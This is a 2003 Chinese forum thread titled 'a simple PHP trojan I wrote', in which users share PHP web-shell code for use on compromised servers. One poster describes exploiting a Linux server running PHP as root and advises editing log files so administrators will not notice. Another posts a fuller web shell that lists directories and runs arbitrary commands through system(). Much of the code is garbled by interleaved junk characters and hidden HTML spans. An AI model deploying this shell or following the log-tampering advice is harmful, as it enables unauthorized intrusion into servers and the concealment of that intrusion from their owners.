我写的一个PHP的简单木马

ASEE

重在实用，HoHo,某天发现某个LINUX服务器居然使用root权限执行PHP，真是让我心动不已，浏览器就是我的SHELL，因为有root权限，因此我就%￥##··*，当然不要忘了修改日志文件，HoHo,不然管理员会告你。 ( W' o; N, _9 S# q9 W7 K. `* hxx.php如下（太简陋了，不免高手门笑话，hoho） t- W v# C2 r. D6 ? //获得指定文件的文本 function getfile($filename) { if (!$filename){ return false; } / u. H7 t2 g2 H5 a; G $fp = @fopen($filename,"r"); 0 |- r1 \& M! o4 O if (!$fp){ return false; } $fdata = @fread($fp,filesize($filename)); fclose($fp); 0 R4 M% G; c/ I% |4 @* \: y+ { return $fdata; } $str="

yzhlinux

ACEE 的程序用来得到文件在好不过，工厂虽小，但是还用了摸板替换的思想，可贵！ 但是在得到指定文件之前必须先看看服务器上都有些什么，想在服务器上执行命令，ACEE 的命令执行功能不够，这里我给大家这个专业的 shell。 /* GNU */ /* 您可以任意传播，不过请一定写出作者名字 */ U- z' R3 G+ _5 S/* 原作者： Martin Geisler 改写汉化： YZHLINUX */ . M& N4 o: |8 X0 @7 R$ y' h 1 }* k) @7 O9 ?) ^" }2 t4 U7 @ . ~7 [6 [0 {- V3 s5 ~) T- U 6 x/ v: T$ @( y/* 首先检查 $work_dir 是否被设置了值,这是我们的工作目录 */ if (isset($work_dir)) { /* 说明已经设置了 工作目录 ,那么我们就吧当前目录改变倒这个地方 */ chdir($work_dir); $work_dir = exec("pwd"); // pwd 是 Unix 中显示当前目录的命令,这里我们执行它.得到当前目录 } else { /* 如果没有设置 工作目录,那么我们就到 apache 的工作目录 " K0 ^" w) e5 g' x N9 N 注: $DOCUMENT_ROOT 是系统提供的*/ " W9 X6 L, f& U3 }/ V: a chdir($DOCUMENT_ROOT); $work_dir = $DOCUMENT_ROOT; 0 R' n3 F1 a9 Y3 g} ?>

当前工作目录: " K' E) F6 N# @5 { f) H) Z/ i( f$ P" K5 a $work_dir_splitted = explode("/", substr($work_dir, 1)); 1 ^( V B1 d" J0 p$ F; wecho "Root/"; if ($work_dir_splitted[0] == "") { % F9 M9 ?6 h# c; N2 y, I $work_dir = "/"; /* 根目录. */ } else { ]# b6 n: g0 @& H for ($i = 0; $i < count($work_dir_splitted); $i++) { * o: h4 X& z- k /* echo "i = $i";*/ q' t0 g% {% M: t: { $url .= "/".$work_dir_splitted[$i]; echo "$work_dir_splitted[$i]/"; } ( D+ B" ?. B+ b( g3 Y" E} # { ^" S, F7 X; Q1 N1 h?>

选择新的工作目录:

2 c$ i7 E' n/ _8 d- J/* 现在我们对这个目录坐一个文件列表 */ ; `6 c% X! k' M* D8 A$ p; m$dir_handle = opendir($work_dir); $ X7 l4 u3 c) w9 m/* 来一个遍历找出所有的文件和目录 */ while ($dir = readdir($dir_handle)) { if (is_dir($dir)) { $ i- D4 ?$ ?9 f# i if ($dir == ".") { echo "Current Directory\n"; } elseif ($dir == "..") { /* 我们找到了父目录,我们要注意里看看父目录是不是根目录 (/) */ if (strlen($work_dir) == 1) { /* 长度只有 1 ---- 那么只能是 '/' 了 */ ( l: b2 F# _3 @, ~( l0 A } elseif (strrpos($work_dir, "/") == 0) { /* 发现第一个字符是 / 说明我到了顶层的目录了比如: /bin 或者 /home etc... */ ; g$ ?/ v T; ], Z echo "Parent Directory\n"; } else { echo "Parent Directory\n"; ! [6 l; ^" u J& z# ~ } - n- z+ l' \8 p' @ } else { if ($work_dir == "/") { 5 b1 M. J9 L8 l6 ] C0 I$ p( N- K echo "$dir\n"; / e# Q9 C7 q) l& B } else { echo "$dir\n"; + Y: Q2 r8 M1 I3 d' P2 a( C+ O% H } : ?/ ?" _! p! t } & F0 e+ |6 g* x [7 P. r } $ Z2 c$ R5 u9 o& ~; s} 5 L: k ?* A4 O& S5 @, [1 y closedir($dir_handle);//不要忘记关闭 & p/ h4 L& q0 j- t: h7 V?> + p; Q' G/ u' P: G% W/ w

命令:

>

是否捕获错误信息?

Output:

$ c- r4 r+ R9 Q; J3 Y<span style="display:none">0 F/ g$ s1 R8 ~( o</span><?php <span style="display:none">0 t3 K* u5 O1 K- F1 Z</span>if ($command) { <span style="display:none">9 T+ d( [, h1 ^' a( j. u</span> if ($stderr) {<font class="jammer">) |, w# I6 j" w7 N</font> /* 这个命令组能看懂吗? <span style="display:none">: V5 p! Z# s1 P2 ^</span> 短短的一句语句但是做的事情有: 执行命令,把输出的结果保存到 output.txt ,显示 output.txt ,然后删除它!*/<font class="jammer">3 w+ ]. c N P* T</font> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");<font class="jammer">( ~$ n) `- g b* y; y" ^</font> }else { <span style="display:none">% n# C( n! k' L' x4 @</span> system($command);<font class="jammer">8 p3 M5 V9 }* B" t. L" o</font> }<font class="jammer">1 y+ w3 g% \ M: s</font> } <span style="display:none">: Z# ^- T4 H5 z5 P/ X4 ?' d</span>?> <span style="display:none">: N' A! m3 U& M1 a9 p% w1 c4 y+ j# Q</span> $ l7 X; p0 _3 b9 C J- h

5 l7 d! b$ }( q0 `$ A 0 v# @# U4 x/ W1 C6 c! I8 U

[此贴子已经被作者于2003-8-6 15:48:22编辑过]

ASEE

不错，不错。

猴子很忙

能力有限，看不懂。。

晕晕了，第二篇就不看了，第一篇好像见到过了

ASEE

我写的代码还算简洁，噢，HOHO。。。那里见过也不奇怪，需要的时候就自己写。抄一百行代码还不如自己写一行，PHP只能处理字符，处理网叶，干不成大事，说白了，PHP还不如UNIX的各种SHELL。

yzhlinux

PHP 也是可以做Unix 的一个shell的。
, j; [9 w: z) S  x+ L9 w5 o语法就是php的语法，只要把编译好的cgi模式的解析程序执行，就是一个shell外壳了

ASEE

是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
  Y( k1 P6 @9 d4 a( q5 H7 `不过不知道版权会被我们侵犯到什么地步 ：（

yzhlinux  ASEE，你们都是工程的吗？计算机系吗？程序方面很强哦。
- `, F& M) b' T) [4 y我是工程的，但不是计算机系的。

yzhlinux

这你也看的出来？
$ Z8 _* y; `3 S! R$ k我们既不是工程的也不是计算机系的

哦，这里的工程比较多啊，所以猜的，那你们什么学校的啊？

yzhlinux

我们都工作了你看不出来吗？

呵呵，没看出来，都是哪儿的，搞程序的？

yzhlinux

提供真人实姓，就不叫BBS了，那我注册了帐号还有什么意思？ ：）

又没让你说姓名，我想了解一下这里的高手有多少是学生啊

ASEE

以下是引用ASEE在2003-8-12 23:12:00的发言：
是啊，我都有这个想法啊，php 的 VC 源代码我看了很久了，我觉得可以把它改动成我们所设想的东西，嵌入到我们的其他程序中去做控制脚本。HoHo,功能强大哦！
6 ~* i6 V7 s7 V9 ]% t9 d 不过不知道版权会被我们侵犯到什么地步 ：（

) }* W2 d5 Z: K. \  d7 N我有种发梦的感觉，是不是我眼花了，昨晚太累打字打错了，竟然写出这样的话来，我死也不信，如果有人攻击BBS，那就另当别论，或者帮主看不过去，那有另当别论。

yzhlinux

哪里啊，那是我要回复你的，结果却按错了，点成了编辑 ：（。
想恢复都不行了！ 你说的是什么我现在都忘记了！郁闷！

ASEE

看来这个BB让人郁闷，不过还算快。要不真象上CSDN一样，半天都进不去，干脆不去了，XML做的看来也不过如此，WEB SERVICE也不过如此，.NET也不过如此。

yzhlinux

这里人不多啊，自然快，CSDN 是快的，主要人太多，同时再线的比这里多500倍以上，半夜2:00以后你试试，那时没人，狂快！
2 L5 H* O; {, m

yzhlounx 你是工程的吧  呵呵
# m' [! ], S. ^; C, Z) g! `$ O& p